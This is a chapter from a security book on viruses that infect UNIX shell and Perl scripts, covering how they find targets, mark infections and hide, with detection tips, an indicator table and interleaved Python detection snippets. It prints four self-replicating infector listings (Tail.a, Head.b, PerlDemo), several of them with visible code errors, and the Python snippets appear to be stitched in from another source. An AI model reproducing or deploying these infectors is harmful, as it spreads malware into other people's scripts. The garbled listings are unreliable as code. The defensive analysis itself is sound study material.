Chapter 18: Viruses in Scripts | Shellcoders Programming Uncovered (Uncovered series)

Overview

As mentioned earlier, scripts are a friendly environment for the propagation of viruses, for the following reasons:

In the UNIX world, scripts are omnipresent.
Modification of most script files is allowed.
Most frequently, scripts comprise hundreds of code lines, in which it is easy to get lost.
Scripts are abstracted from the implementation details of specific UNIX versions.
Capabilities of scripts are comparable to those of high-level programming languages (C, Basic, Pascal).
Users exchange scripts more intensely than executable files.

Most administrators neglect script viruses and scornfully call them "fictitious" viruses. However, to the system under attack it makes no difference whether the virus is a "true" one. Although script viruses look like toys, they pose a serious threat. Their natural habitat is practically unlimited: they successfully infect all types of computers, including those based on Intel Pentium, DEC Alpha, and Sun SPARC processors. They can insert themselves into any location (head, tail, or middle) of the file being infected. If desired, they can remain in memory and infect files in the background. Some script viruses use stealth techniques to conceal their presence in the system. Virus writers have even mastered polymorphism, putting script viruses on an equal footing with viruses that infect binary files.

Therefore, every script obtained from outside must be carefully checked for viruses before it is installed on the system. The situation is made worse because, in contrast to binary files, scripts are plain text with no internal structure, so infection produces no typical structural changes. The only detail that viruses cannot forge is the layout style of the listing. Every programmer has an individual style of formatting source code, just as every individual has his or her own handwriting. Some use tab characters; others prefer spaces for alignment. Some programmers like to expand the if-else construct over the entire screen, and others fit it within a single line. Some programmers prefer to give all variables meaningful names, but others use meaningless names one or two characters long. Even a brief look at an infected file will reveal foreign insertions (provided that the virus doesn't reformat the object being infected). For example, consider Listing 18.1, which presents a virus that discloses its presence by formatting-style differences. The lack of line feed (<LF>) characters is atypical for normal scripts and will immediately attract the attention of the system administrator.

Listing 18.1: Example of a virus that discloses its presence by an untypical formatting style

 #!/usr/bin/perl #PerlDemo open(File,$0); @virus=<File>; @Virus=@Virus[0...6]; close(File); foreach $FileName (< ^* >) { if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { open(File, "$FileName"); @Temp=<File>; close(File); if ((@Temp[1] =~ "PerlDemo") or (@Temp[2] =~ "PerlDemo")) { if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl")) { open(File, ">$FileName"); print File @Virus; print File @Temp; close (File); } } } }
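The formatting-style check described above can be partly automated. The following is a minimal sketch, not a definitive detector: it flags lines that are far longer than the file's median line, which is how code crammed together without line feeds would stand out. The function name, the `factor` multiplier, and the `min_length` floor are assumptions chosen for illustration.

```python
import statistics


def unusually_long_lines(text, factor=4.0, min_length=120):
    """Return 1-based numbers of lines much longer than the file's median line.

    factor and min_length are illustrative thresholds, not values from the text.
    """
    lines = text.splitlines()
    # Measure only non-blank lines so that empty lines do not drag the median down.
    lengths = [len(line) for line in lines if line.strip()]
    if not lengths:
        return []
    threshold = max(min_length, factor * statistics.median(lengths))
    return [number for number, line in enumerate(lines, start=1)
            if len(line) > threshold]
```

A hit only marks a line for manual review; minified or generated scripts produce long lines for perfectly legitimate reasons.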

An expertly designed virus infects only files of a type suitable for infection; otherwise, it would quickly crash the system, disclosing its presence and paralyzing further propagation. Because UNIX has no tradition of giving files name extensions, searching for suitable targets becomes considerably more complicated: the virus must explicitly try one file after another, checking each type "manually."

There are at least two techniques for carrying out this task: identifying the command-line interpreter and heuristic analysis. With the first technique, if the #! "magic sequence" is found at the start of the file, the remainder of the line contains the path to the program that processes the script. For the Bourne interpreter, this line usually appears as #!/bin/sh, and for Perl it is #!/usr/bin/perl. Thus, in most cases, determining the file type is reduced to reading the first line and comparing it with one or more templates. Unless the virus compares hashes, the reference strings will be explicitly present in the infected file, so the virus's presence can be easily detected using a trivial context search (see Listings 18.2 and 18.3).
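The context search mentioned above might be sketched as follows. This is an illustrative sketch under stated assumptions: the two reference strings are the ones named in the text, while the function names and the backslash normalization (meant to catch escaped forms such as "\#\!\/usr\/bin\/perl") are hypothetical choices, not part of any existing tool.

```python
# Interpreter lines named in the text; extend the tuple for other interpreters.
REFERENCE_STRINGS = ("#!/bin/sh", "#!/usr/bin/perl")


def interpreter_of(text):
    """Return the interpreter path from a leading '#!' line, or None."""
    first_line = text.split("\n", 1)[0]
    if not first_line.startswith("#!"):
        return None
    parts = first_line[2:].split()
    return parts[0] if parts else None


def embedded_reference_strings(text):
    """Return (line_number, line) pairs where a reference string occurs after line 1."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        # Dropping backslashes lets escaped spellings match the plain templates.
        normalized = line.replace("\\", "")
        if number > 1 and any(ref in normalized for ref in REFERENCE_STRINGS):
            hits.append((number, line.strip()))
    return hits
```

An interpreter line is expected only on line 1, so any later occurrence, especially inside a comparison, deserves a closer look.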

Listing 18.2: Fragment of the UNIX Tail.a virus that writes itself to the tail of the target file

 #!/bin/sh
 echo "Hello, World!"

 for F in ^*
 do
   if ["$(head -c9 $F 2>/dev/null)"="#!/bin/sh" -a "$ (tail -1 $F 2>/ dev/null)"!="#:-P"]
   then
         tail -8 $0 >> $F 2>/dev/null
   fi
 done
 #:-P

Listing 18.3: Fragment of UNIX.Head.b inserting its body into the beginning of the target file

 #!/bin/sh

 for F in ^*
 do
         if [ "$(head -c9 $F 2> /dev/null) " = "#!/bin/sh" ]
         then
                 head -11 $0 > tmp
                 cat $F >> tmp
                 my tmp $F
         fi
 done

 echo "Hello, World!"

Nine script viruses out of ten can be disclosed using this trivial technique. The more sophisticated ones carefully conceal the reference strings from outsiders' eyes. For example, the virus might encrypt the reference strings or compare them character by character. However, before comparing a string to the reference, the virus must read it. As a rule, batch files use the grep or head commands for this purpose. The presence of these commands in a file is not in itself proof of infection; however, it allows an administrator to locate the vitally important parts of the virus responsible for determining the file type, which considerably speeds up the analysis. In Perl scripts, the file-read operation is most frequently carried out using the < > (angle-bracket) operator; functions such as read, readline, and getc are used more rarely. Because no serious Perl program can do without file input/output, detecting the virus code becomes much harder, especially if the file is read in one program branch and its type is determined in a different branch. This complicates automated analysis; however, it doesn't make such analysis impossible.

Heuristic algorithms for finding infection targets detect unique sequences that are typical for the given file type and never encountered in files of other types. For example, the presence of the if [ sequence indicates a batch script with a probability close to one. Some viruses identify batch scripts by the Bourne string, which is present in most scripts. There are no universal techniques for recognizing heuristic algorithms (after all, that is precisely why heuristic algorithms were invented).
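To judge which files such a heuristic would select, an analyst can apply the same test. The sketch below assumes only the two hints named in the text (the if [ sequence and the word Bourne); the function name and the exact regular expressions are hypothetical.

```python
import re

# The two hints mentioned in the text; real heuristics may use others.
SHELL_HINTS = (
    re.compile(r"\bif\s+\["),   # the "if [" sequence
    re.compile(r"\bBourne\b"),  # the word "Bourne", typically found in comments
)


def looks_like_shell_script(text):
    """Return True if any hint typical of shell scripts occurs in the text."""
    return any(pattern.search(text) for pattern in SHELL_HINTS)
```

Running this over a directory shows which files a heuristic of this kind would treat as candidates, which narrows down where to look first.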

To avoid reinfecting the host file multiple times, viruses must recognize their presence in such files. The most obvious (and, consequently, most popular) algorithm is to insert a special key label: a unique sequence of commands, a virus signature of sorts, or simply an intricate comment. Viruses do not need guaranteed uniqueness. It is enough to ensure that the key label is missing in more than 50% of uninfected files. The search for the key label can be carried out using the find and grep commands or by reading the file line by line and comparing the lines with the reference ones. Command-interpreter scripts use the head and tail commands for this purpose, in combination with the = operator. Perl viruses tend to use regular expressions, which considerably complicates their detection because practically no Perl program can do without regular expressions.
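Once a key label is known, the same check the virus performs can be turned against it. The following sketch assumes a small list of labels taken from this chapter's listings (#:-P and #PerlDemo); the function name and the `window` parameter, which limits the search to the first and last few non-blank lines, are assumptions made for illustration.

```python
# Labels that appear in this chapter's listings; a real list would be longer.
KNOWN_LABELS = ("#:-P", "#PerlDemo")


def find_key_labels(text, labels=KNOWN_LABELS, window=3):
    """Return the known labels found near the head or tail of the text."""
    lines = [line.strip() for line in text.splitlines() if line.strip()]
    # Labels are looked for only where head and tail would inspect the file.
    edge = lines[:window] + lines[-window:]
    return sorted({label for label in labels
                   if any(label in line for line in edge)})
```

Because viruses do not need their labels to be unique, a match is a reason to inspect the file, not proof of infection.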

Another possible clue is the $0 variable, which viruses use to determine their own names. Interpreted languages have no idea how scripts are located in memory, so a script cannot reach its own image there however much it might want to. Thus, the only way for a virus to reproduce its body is to read the source file, the name of which is passed in argument 0 of the command line. This is characteristic evidence that the file being investigated has been infected, because there are few reasons a program might be interested in its own path and file name.
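A search for this clue could look roughly like the sketch below. It is deliberately narrower than a plain search for $0: it reports only lines where $0 appears after a command that reads a file, so that ordinary usage messages are not flagged. The command list, the regular expression, and the function name are assumptions, not an established signature.

```python
import re

# A file-reading command followed later on the same line by $0 or ${0}.
# The lookahead rejects longer names such as $01 or $0abc.
SELF_READ = re.compile(
    r"\b(head|tail|cat|grep|sed|open)\b[^\n]*?\$\{?0\}?(?![0-9A-Za-z_])"
)


def self_reading_lines(text):
    """Return (line_number, command) pairs for lines that appear to read $0."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        match = SELF_READ.search(line)
        if match:
            hits.append((number, match.group(1)))
    return hits
```

Legitimate scripts occasionally read their own source too (for example, to print embedded help text), so each hit still needs a human decision.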

There is another method of spawning (at least in theory). It works on the same principle as a program that prints its own source (once upon a time, no student computer science contest could do without this problem). The solution is to form a variable that contains the program code of the virus and then insert it into the file to be infected. In the simplest case, the << construct can be used, which allows the code insertion to be concealed in a text variable (an advantage of Perl over C). Line-by-line code generation such as @virus[0]= "\#\!\/usr\/bin\/perl" is encountered more rarely because it is too bulky, impractical, and self-evident (the virus will be located immediately, even on a brief look at the listing).

Encrypted viruses are even easier to recognize. The most primitive instances contain a large number of "noisy" binary sequences such as \x73\xFF\x33\x69\x02\x11..., where the \x specifier serves as a flag followed by the hexadecimal code of the encrypted character. More advanced viruses use variants of UUE encoding, thanks to which all encrypted lines appear readable although they represent meaningless garbage like usKL[as4iJk. Given that the minimal length of Perl viruses is, on average, about 500 bytes, they can be easily hidden inside the body of the host file.
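The "noisy" sequences of the primitive variety lend themselves to a simple density measure. The sketch below flags lines in which \xNN escapes make up a large share of the characters; the threshold of 0.5 and the minimum of eight escapes are arbitrary illustrative values, and the function names are hypothetical. It does not address UUE-style encodings, whose output looks like ordinary printable text.

```python
import re

# A backslash, the letter x, and exactly two hexadecimal digits.
HEX_ESCAPE = re.compile(r"\\x[0-9A-Fa-f]{2}")


def hex_escape_ratio(line):
    """Return the fraction of the line's characters that belong to hex escapes."""
    if not line:
        return 0.0
    # Every escape occupies four characters.
    return 4 * len(HEX_ESCAPE.findall(line)) / len(line)


def noisy_lines(text, threshold=0.5, min_escapes=8):
    """Return 1-based numbers of lines dominated by hex escapes."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        count = len(HEX_ESCAPE.findall(line))
        if count >= min_escapes and hex_escape_ratio(line) >= threshold:
            hits.append(number)
    return hits
```

Requiring both a minimum count and a minimum ratio keeps a single escaped newline or tab in an ordinary string from triggering a report.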

Now consider the methods of inserting the virus into the host file. Command-interpreter files and programs written in Perl are hierarchical sequences of commands, including function definitions where necessary. There is nothing here that bears even the slightest resemblance to the main function of the C language or the BEGIN/END block of Pascal. Virus code simply added to the tail of the file will, with 90% probability, gain control and work successfully. The remaining 10% covers cases in which the program terminates prematurely through the exit command or is forcibly terminated by the <Ctrl>+<C> key combination. To copy their bodies from the end of one file to the end of another, viruses, as a rule, use the tail command, which they call approximately as shown in Listing 18.2 (there, the first two lines belong to the original target file).

Other viruses insert their bodies into the start of the file, capturing full control. Some of them contain an amusing error that results in duplication of the #!/bin/xxx string: the first copy belongs to the virus itself and the second belongs to the infected program. The presence of two #! magic sequences in the file being analyzed serves as clear evidence of infection. However, most viruses handle this situation correctly, copying their bodies from the second line, not from the first one. A typical example of such a virus is presented in Listing 18.3 (there, the original content of the target file follows the virus body).

A few viruses, however, insert their bodies into the middle of the file, sometimes mixing them with the original content of the target file. To keep the self-reproduction process from being interrupted, the virus must either mark "its" lines in some way (for example, by adding comments such as #MY LINE) or insert its code into lines with fixed numbers. For instance, the following rule might be adopted: starting from line 13, every odd line of the file contains the virus body. The first algorithm is too self-evident, and the second is not viable, because one part of the virus might fall into one function and another part into a different function. Therefore, such viruses are not worth considering here.

Thus, the head and the tail of every script file are the most probable locations, into which script viruses would try to insert their bodies. They must be considered most carefully, without forgetting that the virus might contain a certain number of deceitful commands imitating some kinds of useful work.

It is also possible to encounter "satellite" viruses, which do not even touch original files but instead create lots of their replicas in other directories. The fans of "pure" command lines, who usually view the contents of directories using the ls command, might not even notice this, because the ls command might have a "twin" that providently removes its name from the list of displayed files.

In addition, do not forget that virus writers might be so careless that they give procedures and variables names that are too revealing, such as "Infected," "Virus," or "Pest."

Sometimes, viruses (especially polymorphic and encrypted ones) need to place part of the program code into a temporary file and pass control to it, fully or partially. In this case, the chmod +x command, which assigns the executable attribute to the temporary file, will appear in the script body. Nevertheless, you shouldn't expect the author of the virus to be so lazy or so naive as to make no effort to conceal the virus activity. Most frequently, in such cases you'll encounter something like the following: chmod $attr $FileName.

Table 18.1 lists typical constructs that indicate the presence of script viruses, with brief comments provided.

Table 18.1: Typical indications of virus presence
Indication	Comment
#!/bin/sh "\#\!\/usr\/bin\/perl"	If this string is located in a line other than the first line of the file, then the script is probably infected, especially if the #! sequence is located somewhere inside the if-then operator or is passed to the grep and/or find commands.
grep find	These are used for determining the type of the target file and for searching for the infection mark (to avoid reinfecting the file). Their presence alone is not sufficient evidence of infection, because they are also used in "honest" scripts.
$0	This is a typical indication of a self-reproducing program. (Why else might the script need to know its full path?)
head	This is used for determining the type of the target file and retrieving the virus body from the beginning of the host script.
tail	This is used for retrieving the virus body from the tail of the host script.
chmod +x	If this command is applied to a dynamically-created file, this with a high level of probability can be considered an indication of the virus's presence (at the same time, the +x key might be concealed in some way).
<<	If this operator is used for loading software code into the variable, this is a typical indication of the presence of some virus (including polymorphic ones).
"\xAA\xBB\xCC..." "Aj#9KlRzS"	These are typical indications of an encrypted virus.
vir, virus, virii, infect...	This is a typical indication of the virus's presence; however, this also might simply be a joke.
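Several rows of the table translate directly into pattern searches. The following is a minimal, table-driven sketch covering four of them (file-probing commands, chmod +x, the << operator, and telltale names); the indicator names, the regular expressions, and the `scan` function are assumptions made for illustration, and every hit is only a lead for manual review, as the comments in the table make clear.

```python
import re

# (indicator name, pattern) pairs paraphrasing rows of Table 18.1.
INDICATORS = [
    ("file-probing command", re.compile(r"\b(grep|find|head|tail)\b")),
    ("chmod +x", re.compile(r"\bchmod\s+\+x\b")),
    ("<< operator", re.compile(r"<<")),
    ("telltale name", re.compile(r"virus|virii|\bvir\b|infect", re.IGNORECASE)),
]


def scan(text):
    """Map each indicator name to the 1-based line numbers where it occurs."""
    report = {name: [] for name, _pattern in INDICATORS}
    for number, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS:
            if pattern.search(line):
                report[name].append(number)
    return report
```

Keeping the indicators in a list rather than in code makes it easy to add rows as new constructs are encountered, without touching the scanning loop.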

To practice visual detection of typical constructs indicating a virus's presence, consider Listing 18.4.

Listing 18.4: Fragment of the UNIX.Demo Perl virus

 #!/usr/bin/perl
 #PerlDemo
 open (File, $0);
 @Virus = <File>;
 @Virus  =  @Virus[0...27];
 close (File);
 foreach $FileName (< ^* >) {
         if ((-r $FileName) && (-w $FileName) && (-f $FileName))
         {
             open(File, "$FileName");
             @Temp - <File>;
             close(File);
             if ((@Temp[1] =~ "PerlDemo") or (@Temp[2] =~ "PerlDemo"))
             {
                      if ((@Temp[0] =~ "perl") or (@Temp[1] =~ "perl"))
                       {
                                open(File, ">$FileName");
                                print File Virus;
                                print File @Temp;
                                close (File);
                       }
             }
         }
 }